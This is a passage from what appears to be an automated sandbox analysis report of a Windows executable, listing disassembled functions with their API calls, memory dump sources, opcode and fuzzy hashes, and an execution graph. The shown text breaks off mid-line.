                                                                              • Instruction Fuzzy Hash: 36F082B31007017BD2106777EC89CAB7F6CEB953B47500A3FF915D25D1EA39982486B8
                                                                              Function 0040D288 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(?,00409825), ref: 0040D28F
                                                                              • RtlAllocateHeap.NTDLL(00000008), ref: 0040D2AA
                                                                              • TlsSetValue.KERNEL32(00000000,?,?,00409825), ref: 0040D2B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Value$AllocateHeap
                                                                              • String ID: zJ
                                                                              • API String ID: 4003031417-2817043822
                                                                              • Opcode ID: b6fa0aa91cfb2dda7c355575a8d23ae573fcd81ff672684e9cee781b12038817
                                                                              • Instruction ID: 16796b595869507936613635a6341ddf17832f1f70e812bebed35ae43026f1bf
                                                                              • Opcode Fuzzy Hash: b6fa0aa91cfb2dda7c355575a8d23ae573fcd81ff672684e9cee781b12038817
                                                                              • Instruction Fuzzy Hash: 15F06D36644600ABCA264B5AFC08E973B76EBC0770305883EF946A32A0CB34EC44CA1C
                                                                              Function 0040B1D6 Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: memset$memcpy
                                                                              • String ID:
                                                                              • API String ID: 368790112-0
                                                                              • Opcode ID: 8039a587939ac30c6fc37cd8e94445a8ac57574f9db84ba66d1265f83776addf
                                                                              • Instruction ID: d1c0989406727a65e9950a574f083ae989d166c781cac5fdd553c274dd2af307
                                                                              • Opcode Fuzzy Hash: 8039a587939ac30c6fc37cd8e94445a8ac57574f9db84ba66d1265f83776addf
                                                                              • Instruction Fuzzy Hash: D821F1317507082BE124AA29DC86F9F738CDB81708F40063EF201FA1C1CAB9F54546AE
                                                                              Function 00405B40 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeapwcsncpy
                                                                              • String ID:
                                                                              • API String ID: 1358295784-0
                                                                              • Opcode ID: abfa07bf7e2ff51294c19b5adc2ec100302e178060cdb4fdf4646927b08b7264
                                                                              • Instruction ID: cb064e81f22c81d64e764a7bfd7558cc4db0c0b6a5bd9f26a61017110445664c
                                                                              • Opcode Fuzzy Hash: abfa07bf7e2ff51294c19b5adc2ec100302e178060cdb4fdf4646927b08b7264
                                                                              • Instruction Fuzzy Hash: 2151DE305087059BDB209F28D844A6BB7F4FF84348F544A2EFC45A72D0E778E915CB9A
                                                                              Function 0040D51F Relevance: 6.1, APIs: 4, Instructions: 134memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0040D533
                                                                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D5E8
                                                                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0040D60B
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0040D663
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCriticalHeapSection$EnterLeave
                                                                              • String ID:
                                                                              • API String ID: 3625150316-0
                                                                              • Opcode ID: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
                                                                              • Instruction ID: c75203acf5dbc6b13cd53f4330a4279d02754d6c9a51f963ab4d277c9f4d2c3e
                                                                              • Opcode Fuzzy Hash: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
                                                                              • Instruction Fuzzy Hash: 67510570900B02AFC324CF69D980922B7F4FF587147108A3EE8AA97A94D335F959CB94
                                                                              Function 00406610 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CharLower
                                                                              • String ID:
                                                                              • API String ID: 1615517891-0
                                                                              • Opcode ID: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
                                                                              • Instruction ID: 85927fc96f9716e1d1e6d5b1ddc4ac0db90fb70db8c0b3b43891102a4ed5054c
                                                                              • Opcode Fuzzy Hash: 66c029c88698f590c27d8ad2e0cedff0409db7e2b7cc0c33a88c903db2356ffd
                                                                              • Instruction Fuzzy Hash: 3A215775A043198BC710EF59A840477B7E4EB80761F46087AFC85A3380D63AEE199BB9
                                                                              Function 00409FE3 Relevance: 6.1, APIs: 4, Instructions: 80memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeapmemsetwcscpywcslen
                                                                              • String ID:
                                                                              • API String ID: 2037025450-0
                                                                              • Opcode ID: 60b0d08681e9ec0db2ddeea0910c20863a20b1ea765bcf14a5cb697a1bcb1fc5
                                                                              • Instruction ID: 6837a03683538e1df5e2bdda5e350eaa22186be17e149c7482ea07580a24f61f
                                                                              • Opcode Fuzzy Hash: 60b0d08681e9ec0db2ddeea0910c20863a20b1ea765bcf14a5cb697a1bcb1fc5
                                                                              • Instruction Fuzzy Hash: 2F21F732400B04AFC331AF259881B67B7F5EF88318F14453FFA4562692D739A8148B1E
                                                                              Function 00409D80 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E9A
                                                                                • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
                                                                                • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
                                                                                • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0
                                                                              • RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409D9F
                                                                              • RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409DC5
                                                                              • RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409E22
                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Free$Allocate
                                                                              • String ID:
                                                                              • API String ID: 3472947110-0
                                                                              • Opcode ID: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
                                                                              • Instruction ID: 0e5c90150bc367b96ffc2f2020c4fe6cd7e8dd6a87ef93d6b65d9b762928b75a
                                                                              • Opcode Fuzzy Hash: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
                                                                              • Instruction Fuzzy Hash: 66216D71644711ABD3118F2ADD01B46BBE8FF48750F40812AB608E7691D770EC65CB98
                                                                              Function 0040E0D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wcslen.MSVCRT ref: 0040E0E5
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,0000000A), ref: 0040E109
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,00000000,0000000A), ref: 0040E12D
                                                                              • HeapFree.KERNEL32(?,00000000), ref: 0040E164
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Allocate$Freewcslen
                                                                              • String ID:
                                                                              • API String ID: 584413571-0
                                                                              • Opcode ID: d10227275c7b6081de2ee05023da87eadddda2e83e478cb8004c91b3b4e22bf4
                                                                              • Instruction ID: 5c25edb19946727406606906c76980e1d10e687976c030b77a126e3da493f9c6
                                                                              • Opcode Fuzzy Hash: d10227275c7b6081de2ee05023da87eadddda2e83e478cb8004c91b3b4e22bf4
                                                                              • Instruction Fuzzy Hash: BD212774604209EFDB04CF94D884FAAB7BAFB48354F108569F9099F390D735EA41CB94
                                                                              Function 00411E80 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D058,00000000), ref: 00411EB4
                                                                              • malloc.MSVCRT ref: 00411EC4
                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00411EE1
                                                                              • malloc.MSVCRT ref: 00411EF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWidemalloc
                                                                              • String ID:
                                                                              • API String ID: 2735977093-0
                                                                              • Opcode ID: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
                                                                              • Instruction ID: da1f4c5307a9808d3c7f8614f95932c7effa64efca2e052dfed00f08d58b5d3d
                                                                              • Opcode Fuzzy Hash: f99b9e9cc375a0f51ee550c492f080850f9660593670d0a959cc873830a669a1
                                                                              • Instruction Fuzzy Hash: FE012E3734030227E32066A6AC02FE77B49CB85B95F19407AFF005E2C1CAA3A8008A79
                                                                              Function 00411F20 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F51
                                                                              • malloc.MSVCRT ref: 00411F61
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F7B
                                                                              • malloc.MSVCRT ref: 00411F90
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWidemalloc
                                                                              • String ID:
                                                                              • API String ID: 2735977093-0
                                                                              • Opcode ID: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
                                                                              • Instruction ID: 2143df0fa8f9e7073c9e362d0ea50869445b156f554053f4d5fb65981249776a
                                                                              • Opcode Fuzzy Hash: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
                                                                              • Instruction Fuzzy Hash: AE01643738030037E3204A95AC02FA77B4DCBC5B95F19407AFB005E2C6CBB3A8018AB8
                                                                              Function 0040D438 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D443
                                                                              • RtlReAllocateHeap.NTDLL(00000008,?,?), ref: 0040D483
                                                                              • RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D4BE
                                                                                • Part of subcall function 0040DB12: RtlAllocateHeap.NTDLL(00000008,00000000,0040D38C), ref: 0040DB1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCriticalHeapSection$EnterLeave
                                                                              • String ID:
                                                                              • API String ID: 3625150316-0
                                                                              • Opcode ID: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
                                                                              • Instruction ID: a304a92e3806a45bcf6d327fe86cdfb5e6d5534298f9acb62e815e22c79c963c
                                                                              • Opcode Fuzzy Hash: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
                                                                              • Instruction Fuzzy Hash: 30112B32604700AFC3208FA8EC40D56B7FAFF58765B15892AE996E36A0C734F804CB65
                                                                              Function 00408E54 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32 ref: 00408EAA
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00408EBF
                                                                              • GetWindowTextW.USER32(00000000,00000001), ref: 00408ECF
                                                                              • UnregisterClassW.USER32 ref: 00408EF3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow$AllocateClassHeapLengthUnregister
                                                                              • String ID:
                                                                              • API String ID: 1576658079-0
                                                                              • Opcode ID: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
                                                                              • Instruction ID: f973f4e0a74c58c8f3dc6b35f62902cd2ce24d79b6cf0357400b1c80f0f6dd69
                                                                              • Opcode Fuzzy Hash: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
                                                                              • Instruction Fuzzy Hash: 5011CE3100821AFBCB116F64FD0C9AA3F66EB18395B11C03AF949A22F4DA799951DB58
                                                                              Function 0040D67D Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D68F
                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000200,?,?,00409D8F,00000200), ref: 0040D6A6
                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000200,?,?,00409D8F,00000200), ref: 0040D6C2
                                                                              • RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D6DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                                              • String ID:
                                                                              • API String ID: 1298188129-0
                                                                              • Opcode ID: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
                                                                              • Instruction ID: ccb09d183470463af25dc63fc94d1cebb037c249e32c06969674a21ae1653042
                                                                              • Opcode Fuzzy Hash: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
                                                                              • Instruction Fuzzy Hash: BF017C75A0261AEFC7108F95E904967BBBCFF08750301843AE80897654C731E864CFE8
                                                                              Function 00405436 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004053EA: RtlEnterCriticalSection.NTDLL(004176A0), ref: 004053F5
                                                                                • Part of subcall function 004053EA: RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405428
                                                                              • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405446
                                                                              • RtlEnterCriticalSection.NTDLL(004176A0), ref: 00405452
                                                                              • CloseHandle.KERNEL32(?,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000), ref: 00405472
                                                                              • RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405486
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$CloseHandleTerminateThread
                                                                              • String ID:
                                                                              • API String ID: 1388343586-0
                                                                              • Opcode ID: cbc7e9082fcaf871cf348277c49422a471ffdcec75b7c0d4283b3ed47ece0408
                                                                              • Instruction ID: e82d31de5584acb3c1822b09e6e690cbeb5bd259d621742d6e77904c892493b9
                                                                              • Opcode Fuzzy Hash: cbc7e9082fcaf871cf348277c49422a471ffdcec75b7c0d4283b3ed47ece0408
                                                                              • Instruction Fuzzy Hash: D4F0BE36904710EBC2205F60AC48BEB7B68EB44763726843BF80273190C738AC808E6E
                                                                              Function 004096DA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040D288: TlsGetValue.KERNEL32(?,00409825), ref: 0040D28F
                                                                                • Part of subcall function 0040D288: RtlAllocateHeap.NTDLL(00000008), ref: 0040D2AA
                                                                                • Part of subcall function 0040D288: TlsSetValue.KERNEL32(00000000,?,?,00409825), ref: 0040D2B9
                                                                              • GetCommandLineW.KERNEL32(?,?,?,?,?,?,00409838,00000000), ref: 004096F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Value$AllocateCommandHeapLine
                                                                              • String ID: $"
                                                                              • API String ID: 565049335-3817095088
                                                                              • Opcode ID: f04578b7f77a2c145e5ce34ae7d790eae5d8f223c8674fef185d65dfd3ed14c9
                                                                              • Instruction ID: 4c648ba0253d95f00ea60fdf00931512a06ba22242bcbe44c620df30a2d3858e
                                                                              • Opcode Fuzzy Hash: f04578b7f77a2c145e5ce34ae7d790eae5d8f223c8674fef185d65dfd3ed14c9
                                                                              • Instruction Fuzzy Hash: 6031A473525221CADB749F24981137772A1EBB1B60F18817FE8926B3C2F37D8D419359
                                                                              Function 00409E6F Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040A0BA: memset.MSVCRT ref: 0040A122
                                                                                • Part of subcall function 0040D8E6: RtlEnterCriticalSection.NTDLL(0041761C), ref: 0040D8FA
                                                                                • Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D948
                                                                                • Part of subcall function 0040D8E6: RtlLeaveCriticalSection.NTDLL(0041761C), ref: 0040D94F
                                                                              • HeapFree.KERNEL32(00000000,?,?,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E9A
                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                                              • String ID:
                                                                              • API String ID: 4254243056-0
                                                                              • Opcode ID: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
                                                                              • Instruction ID: bfb960cb52ae9f1737c5edf5dab89cb24d0a80b98fb865d44a1203debf2c4dae
                                                                              • Opcode Fuzzy Hash: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
                                                                              • Instruction Fuzzy Hash: 40F0FF31205609BFC6126F5AED40D57BF7DFF5A7983464136B404626B0C732EC619AA8

                                                                              Execution Graph

                                                                              Execution Coverage:3.9%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:692
                                                                              Total number of Limit Nodes:8
                                                                              execution_graph 16774 7ff64b578d80 16775 7ff64b578da4 16774->16775 16776 7ff64b578db6 16775->16776 16777 7ff64b578dbf Sleep 16775->16777 16778 7ff64b578ddb _amsg_exit 16776->16778 16782 7ff64b578de7 16776->16782 16777->16775 16778->16782 16779 7ff64b578e56 _initterm 16780 7ff64b578e73 _IsNonwritableInCurrentImage 16779->16780 16788 7ff64b5737d8 GetCurrentThreadId OpenThread 16780->16788 16781 7ff64b578e3c 16782->16779 16782->16780 16782->16781 16821 7ff64b5704f4 16788->16821 16790 7ff64b573839 HeapSetInformation RegOpenKeyExW 16791 7ff64b57388d 16790->16791 16792 7ff64b57e9f8 RegQueryValueExW RegCloseKey 16790->16792 16793 7ff64b575920 VirtualQuery VirtualQuery 16791->16793 16795 7ff64b57ea41 GetThreadLocale 16792->16795 16794 7ff64b5738ab GetConsoleOutputCP GetCPInfo 16793->16794 16794->16795 16796 7ff64b5738f1 memset 16794->16796 16803 7ff64b573919 16795->16803 16796->16803 16797 7ff64b574d5c 391 API calls 16797->16803 16798 7ff64b573948 _setjmp 16798->16803 16799 7ff64b57eb27 _setjmp 16799->16803 16800 7ff64b563240 166 API calls 16800->16803 16801 7ff64b5701b8 6 API calls 16801->16803 16802 7ff64b574c1c 166 API calls 16802->16803 16803->16792 16803->16797 16803->16798 16803->16799 16803->16800 16803->16801 16803->16802 16804 7ff64b56df60 481 API calls 16803->16804 16805 7ff64b57eb71 _setmode 16803->16805 16806 7ff64b588530 370 API calls 16803->16806 16807 7ff64b5786f0 182 API calls 16803->16807 16808 7ff64b570580 12 API calls 16803->16808 16810 7ff64b5758e4 EnterCriticalSection LeaveCriticalSection 16803->16810 16812 7ff64b56be00 659 API calls 16803->16812 16813 7ff64b5758e4 EnterCriticalSection LeaveCriticalSection 16803->16813 16804->16803 16805->16803 16806->16803 16807->16803 16809 7ff64b57398b GetConsoleOutputCP GetCPInfo 16808->16809 16811 7ff64b5704f4 GetModuleHandleW GetProcAddress SetThreadLocale 16809->16811 16810->16803 16811->16803 16812->16803 16814 7ff64b57ebbe GetConsoleOutputCP GetCPInfo 16813->16814 16815 7ff64b5704f4 GetModuleHandleW GetProcAddress SetThreadLocale 16814->16815 16816 7ff64b57ebe6 16815->16816 16817 7ff64b56be00 659 API calls 16816->16817 16818 7ff64b570580 12 API calls 16816->16818 16817->16816 16819 7ff64b57ebfc GetConsoleOutputCP GetCPInfo 16818->16819 16820 7ff64b5704f4 GetModuleHandleW GetProcAddress SetThreadLocale 16819->16820 16820->16803 16822 7ff64b570504 16821->16822 16823 7ff64b57051e GetModuleHandleW 16822->16823 16824 7ff64b57054d GetProcAddress 16822->16824 16825 7ff64b57056c SetThreadLocale 16822->16825 16823->16822 16824->16822 19649 7ff64b567a40 19652 7ff64b567d30 memset 19649->19652 19651 7ff64b567a5a 19653 7ff64b56ca40 17 API calls 19652->19653 19654 7ff64b567dc3 19653->19654 19655 7ff64b57af72 19654->19655 19656 7ff64b57417c 166 API calls 19654->19656 19657 7ff64b563278 166 API calls 19655->19657 19658 7ff64b567dee 19656->19658 19659 7ff64b57af91 19657->19659 19660 7ff64b56d3f0 223 API calls 19658->19660 19659->19651 19661 7ff64b567dfb 19660->19661 19662 7ff64b57af7e 19661->19662 19669 7ff64b567e09 19661->19669 19662->19655 19663 7ff64b57af89 19662->19663 19664 7ff64b571ea0 8 API calls 19663->19664 19664->19659 19665 7ff64b571ea0 8 API calls 19665->19669 19666 7ff64b56b900 166 API calls 19666->19669 19667 7ff64b57823c 10 API calls 19686 7ff64b567ef1 19667->19686 19668 7ff64b57afae 19674 7ff64b57b03f 19668->19674 19680 7ff64b57afce 19668->19680 19669->19655 19669->19659 19669->19665 19669->19666 19671 7ff64b567ea4 19669->19671 19676 7ff64b57b024 19669->19676 19669->19686 19688 7ff64b567aa0 19669->19688 19670 7ff64b568b20 231 API calls 19670->19686 19672 7ff64b567eb7 ??_V@YAXPEAX 19671->19672 19673 7ff64b567ec3 19671->19673 19672->19673 19675 7ff64b578f80 7 API calls 19673->19675 19674->19655 19678 7ff64b567ed5 19675->19678 19679 7ff64b563278 166 API calls 19676->19679 19677 7ff64b56b364 17 API calls 19677->19686 19678->19651 19679->19659 19680->19659 19681 7ff64b57aff6 19680->19681 19683 7ff64b563278 166 API calls 19680->19683 19681->19659 19682 7ff64b568940 17 API calls 19682->19686 19683->19681 19684 7ff64b578a70 2 API calls 19684->19686 19685 7ff64b573a0c 2 API calls 19685->19686 19686->19659 19686->19667 19686->19668 19686->19669 19686->19670 19686->19674 19686->19677 19686->19682 19686->19684 19686->19685 19689 7ff64b567aeb memset 19688->19689 19690 7ff64b567adb 19688->19690 19691 7ff64b56ca40 17 API calls 19689->19691 19692 